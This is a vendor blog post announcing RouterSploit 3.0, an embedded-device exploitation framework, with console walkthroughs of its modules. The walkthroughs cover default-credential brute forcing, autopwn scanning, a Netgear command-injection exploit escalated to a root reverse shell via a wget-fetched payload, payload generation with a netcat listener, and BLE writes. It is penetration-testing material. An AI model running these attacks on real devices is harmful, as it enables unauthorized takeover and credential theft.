BLOG

Read our latest news

RouterSploit 3.0

  • Offensive Security
  • May 5th, 2018

We are releasing a new version of RouterSploit! For those that prefer experimenting rather than reading documentation, head to github and begin getting your hands dirty.

Download: RouterSploit 3.0

______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ \_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.0.0 Homepage : https://www.threat9.com - @threatnine Join Slack : routersploit.slack.com Join Threat9 Beta Program - https://www.threat9.com Exploits: 121 Scanners: 1 Creds: 166 Generic: 3 Payloads: 21 rsf >

But what has actually changed? One of the most important changes we made is completely switching to Python 3. The support of Python 2.7 ends in 2020 so we decided to take a gamble on Python 3. We know the security community embraces Python 2.7 (and we do also, well, most of the time), but this is something that we think will benefit the project in the future. Also, RouterSploit will now be maintained by Threat9, which means there will be more resources to improve the tool.

Ok, lets move on to describing the actual features...

Default/Hardcoded Credentials

It's 2018 and there is still a huge problem with default and hardcoded credentials. The problem is not only with the devices that contain these vulnerabilities, but also with the solutions that are supposed to detect them (hi various network vulnerability scanners). But why is it so difficult to detect these vulnerabilities? What makes them so unique that all the expensive scanners miss them and at the end of the day large companies with big security budgets are still vulnerable to simple admin/admin?

The answer is pretty simple. Most device manufacturers are introducing custom authentication schemes, which means that vulnerability scanning companies need to write unique modules for EVERY device. And with the billions of devices that are already out there it's basically impossible, even for a large scanning company. So we believe the only way to truly cover all these interfaces and authentication schemes is through a crowdsourced approach.

So this is what we've started doing. We are writing modules for each custom authentication scheme scoped by device. Our hope is that by starting this framework, the community can add in the devices they are working with and we can eventually put a dent in what should be a solved problem.

In the below example we will be testing a Mikrotik API (something that mkbrutus tool was designed for). By default it is running on port 8728/TCP and provides the user with administrative functionalities.

rsf > use creds/routers/mikrotik/api_ros_default_creds rsf (Mikrotik Default Creds - API ROS) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IPv4, IPv6 address or file with ip:port (file://) port 8728 Target API port Module options: Name Current settings Description ---- ---------------- ----------- threads 1 Number of threads defaults admin:admin User:Pass or file with default credentials (file://) stop_on_success true Stop on first valid authentication attempt verbosity true Display authentication attempts

We can display the list of available wordlists and pick one that should be used for the attack.

rsf (Mikrotik Default Creds - API ROS) > show wordlists Wordlist Path -------- ---- defaults.txt file:///Users/lucyoa/git/routersploit-py3/routersploit/resources/wordlists/defaults.txt passwords.txt file:///Users/lucyoa/git/routersploit-py3/routersploit/resources/wordlists/passwords.txt snmp.txt file:///Users/lucyoa/git/routersploit-py3/routersploit/resources/wordlists/snmp.txt usernames.txt file:///Users/lucyoa/git/routersploit-py3/routersploit/resources/wordlists/usernames.txt rsf (Mikrotik Default Creds - API ROS) > set defaults file:///Users/lucyoa/git/routersploit-py3/routersploit/resources/wordlists/defaults.txt [+] defaults => file:///Users/lucyoa/git/routersploit-py3/routersploit/resources/wordlists/defaults.txt rsf (Mikrotik Default Creds - API ROS) > set target 192.168.1.101 [+] target => 192.168.1.101 rsf (Mikrotik Default Creds - API ROS) > run

Once the attack is successful the module returns a valid credentials pair that can be used to access the device.

(..) [*] Elapsed time: 6.237836122512817 seconds [+] Credentials found! Target Port Service Login Password ------ ---- ------- ----- -------- 192.168.1.101 8728 custom/tcp admin admin

Scanning

Good ol' autopwn is still there, but now it also checks for default/hardcoded credentials, so you can just point to the target and autopwn will do the job for you.

rsf > use scanners/autopwn rsf (AutoPwn) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (AutoPwn) > run [*] Running module... [*] Starting vulnerability check... [-] 192.168.1.1:80 http exploits/routers/3com/ap8760_password_disclosure is not vulnerable (..) [*] 192.168.1.1 Starting default credentials check... [-] 192.168.1.1:80 http creds/routers/pfsense/webinterface_http_form_default_creds is not vulnerable [-] 192.168.1.1:21 ftp creds/generic/ftp_default is not vulnerable [-] 192.168.1.1:80 http creds/cameras/basler/webinterface_http_form_default_creds is not vulnerable [-] 192.168.1.1:80 http creds/generic/http_basic_digest_default is not vulnerable [-] 192.168.1.1:80 http creds/routers/asmax/webinterface_http_auth_default_creds is not vulnerable (..) [+] 192.168.1.1 Device is vulnerable: Target Port Service Exploit ------ ---- ------- ------- 192.168.1.1 80 http exploits/routers/dlink/dsl_2750b_info_disclosure

Now we can exploit the target:

rsf (D-Link DSL-2750B Info Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link DSL-2750B Info Disclosure) > run [*] Running module... [+] Credentials found! Option Value ------ ----- 2.4G SSID hidden_network 2.4G PassPhrase admin1234 5G SSID N/A 5G PassPhrase N/A PIN Code 23519243

Exploitation

Exploitation with the RouterSploit framework is pretty simple. All that is required is to pick a module and set the target. In this example, we will exploit the Netgear WNAP320 device that contains a remote code execution vulnerability.

rsf > use exploits/routers/netgear/multi_rce rsf (Netgear Multi RCE) > set target 192.168.0.100 [+] target => 192.168.0.100 rsf (Netgear Multi RCE) > check [+] Target is vulnerable rsf (Netgear Multi RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [*] It is a blind command injection - so a response is not available. Use reverse_tcp [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd >

At this point we could start issuing commands that would be executed on the device. However, the problem with this particular vulnerability is that it is a blind command injection, so we will not be able to see the output from the commands. Instead, we need to establish a more interactive connection with the target, so we will do that by using payloads:

cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture. reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture.

Lets pick the reverse shell payload and configure it:

cmd > set payload reverse_tcp cmd (MIPSBE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lport 5555 Connect-back TCP Port lhost Connect-back IP address cmd (MIPSBE Reverse TCP) > set lhost 192.168.0.99 lhost => 192.168.0.99

After running the payload we are receiving access to the target's /bin/sh

cmd (MIPSBE Reverse TCP) > run [*] Using wget method [*] Setting up HTTP server [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.0.100:46742 [+] Enjoy your shell uname -a Linux netgear 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown id uid=0(root) gid=0(root)

Payloads

If you are familiar with Metasploit (and since you are reading this, there is a high chance you are) this is nothing new. But since the framework requires utilizing payloads we decided to expose them to the user. So now you can easily create ARM/MIPSBE/MIPSLE based payloads and use them for exploiting embedded devices.

rsf > use payloads/mipsle/reverse_tcp rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.12 rsf (MIPSLE Reverse TCP) > set lport 5555 [+] lhost => 192.168.1.12 rsf (MIPSLE Reverse TCP) > set output elf [+] output => elf rsf (MIPSLE Reverse TCP) > run [*] Running module... [*] Generating payload [*] Building ELF payload [+] Saving file /tmp/fucpdGKI rsf (MIPSLE Reverse TCP) > ^D [*] routersploit stopped lucyoa@lucyoas-MBP~/git/routersploit-py3 (master) $ file /tmp/fucpdGKI /tmp/fucpdGKI: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size

We quickly created a small, statically linked reverse shell binary that once executed on MIPS Little Endian architecture will connect to 192.168.1.12 on port 5555 providing us with access to target's /bin/sh.

root@pwning:/tmp$ nc -lvp 5555 Listening on [0.0.0.0] (family 0, port 5555) Connection from [192.168.1.13] port 5555 [tcp/*] accepted (family 2, sport 55720) uname -a Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips GNU/Linux id uid=0(root) git=0(root) groups=0(root)

Bluetooth Low Energy

Did you like Bleah? If so, then you will like our BTLE toolkit as well. We incorporated all of the features from Bleah directly into the framework so you can scan for BTLE devices, enumerate their characteristics, and write directly to the them.

We can identify BTLE devices by using module btle_scan and gather basic information about nearby devices:

rsf (Bluetooth LE Scan) > run [*] Running module... [*] Scanning for BTLE devices... f7:80:cd:45:12:99 (-53 dBm) ------------------------------------ Vendor None (Random MAC address) Allow Connections True Flags LE General Discoverable, BR/EDR Tx Power 06 Complete 128b Services 2753706865726f2d5475a02b6f74bb22 Complete Local Name BB-1299 Manufacturer 3330

Once we know which nearby devices are utilizing Bluetooth Low Energy communication we can target one and start enumerating its characteristics. This will give us an overview of the device and its potential attack surface.

rsf > use generic/bluetooth/btle_enumerate rsf (Bluetooth LE Enumerate) > set target f7:80:cd:45:12:99 [+] target => f7:80:cd:45:12:99 rsf (Bluetooth LE Enumerate) > run [*] Running module... [*] Scanning BTLE device... f7:80:cd:45:12:99 (-63 dBm) ------------------------------------ Vendor None (Random MAC address) Allow Connections True Flags LE General Discoverable, BR/EDR Tx Power 06 Complete 128b Services 2753706865726f2d5475a02b6f74bb22 Complete Local Name BB-1299 Manufacturer 3330 [*] Starting enumerating f7:80:cd:45:12:99 (-63 dBm) ... Handles Service > Characteristics Properties Data ------- ------------------------- ---------- ---- 0001 -> 0007 Generic Access (00001800-0000-1000-8000-00805f9b34fb) 0003 Device Name (00002a00-0000-1000-8000-00805f9b34fb) READ 'BB-1299' 0005 Appearance (00002a01-0000-1000-8000-00805f9b34fb) READ Generic Computer 0007 Peripheral Preferred Connection Parameters (00002a04-0000-1000-8000-00805f9b34fb) READ 0008 -> 000b Generic Attribute (00001801-0000-1000-8000-00805f9b34fb) 000a Service Changed (00002a05-0000-1000-8000-00805f9b34fb) READ INDICATE 000c -> 0011 22bb746f-2ba0-7554-2d6f-726568705327 000e 22bb746f-2ba1-7554-2d6f-726568705327 WRITE NO RESPONSE WRITE 0010 22bb746f-2ba6-7554-2d6f-726568705327 NOTIFY 0012 -> 0033 22bb746f-2bb0-7554-2d6f-726568705327 0014 22bb746f-2bb1-7554-2d6f-726568705327 READ WRITE 0017 22bb746f-2bb2-7554-2d6f-726568705327 WRITE 001a 22bb746f-2bb6-7554-2d6f-726568705327 NOTIFY READ WRITE NO RESPONSE WRITE 001e 22bb746f-2bb7-7554-2d6f-726568705327 READ WRITE NO RESPONSE WRITE 0021 22bb746f-2bb8-7554-2d6f-726568705327 READ '?' 0024 22bb746f-2bb9-7554-2d6f-726568705327 READ '\x0f\x00' 0027 22bb746f-2bba-7554-2d6f-726568705327 READ 002a 22bb746f-2bbd-7554-2d6f-726568705327 WRITE NO RESPONSE WRITE 002c 22bb746f-2bbe-7554-2d6f-726568705327 READ WRITE '\x1e' 002f 22bb746f-2bbf-7554-2d6f-726568705327 READ WRITE NO RESPONSE WRITE '\x00' 0032 22bb746f-3bba-7554-2d6f-726568705327 READ WRITE NO RESPONSE WRITE '\x01\x00' 0034 -> 003b 00001016-d102-11e1-9b23-00025b00a5a5 0036 00001013-d102-11e1-9b23-00025b00a5a5 READ WRITE '\x01' 0038 00001017-d102-11e1-9b23-00025b00a5a5 WRITE 003a 00001014-d102-11e1-9b23-00025b00a5a5 NOTIFY READ '' 003c -> ffff Device Information (0000180a-0000-1000-8000-00805f9b34fb) 003e Hardware Revision String (00002a27-0000-1000-8000-00805f9b34fb) READ 'A\x00\x00\x00\x00\x00' 0040 Serial Number String (00002a25-0000-1000-8000-00805f9b34fb) READ 'F7:80:CD:45:12:99' 0043 Model Number String (00002a24-0000-1000-8000-00805f9b34fb) READ '30\x00' 0045 Manufacturer Name String (00002a29-0000-1000-8000-00805f9b34fb) READ 'Sphero' 0047 Firmware Revision String (00002a26-0000-1000-8000-00805f9b34fb) READ '1.47'

We were able to obtain information such as the device and manufacturer name, as well as the model number and firmware revision.

We have also discovered a number of characteristics that we were not able to be identified. These are most likely used by the app (e.g. mobile app) to control the device. Some of these characteristics allow us to write data to them via the "WRITE" property, so we can try to write some arbitrary data to them.

rsf (Bluetooth LE Enumerate) > use generic/bluetooth/btle_write rsf (Bluetooth LE Write) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target MAC address Module options: Name Current settings Description ---- ---------------- ----------- data 41424344 Data (in hex format) buffering true Buffering enabled: true/false. Results in real time. scan_time 10 Number of seconds to scan for char Characteristic rsf (Bluetooth LE Write) > set target f7:80:cd:45:12:99 [+] target => f7:80:cd:45:12:99 rsf (Bluetooth LE Write) > set char 00001017-d102-11e1-9b23-00025b00a5a5 [+] char => 00001017-d102-11e1-9b23-00025b00a5a5 rsf (Bluetooth LE Write) > set data 41414141 [+] data => 41414141 rsf (Bluetooth LE Write) > run [*] Running module... [*] Scanning BTLE device... f7:80:cd:45:12:99 (-61 dBm) ------------------------------------ Vendor None (Random MAC address) Allow Connections True Flags LE General Discoverable, BR/EDR Tx Power 06 Complete 128b Services 2753706865726f2d5475a02b6f74bb22 Complete Local Name BB-1299 Manufacturer 3330 [*] Searching for characteristic 00001017-d102-11e1-9b23-00025b00a5a5 [+] Sending 4 bytes...

Whats next?

Download the app and happy hunting!

CONTACT US

WE WOULD LOVE TO HEAR FROM YOU


CONTACT US TODAY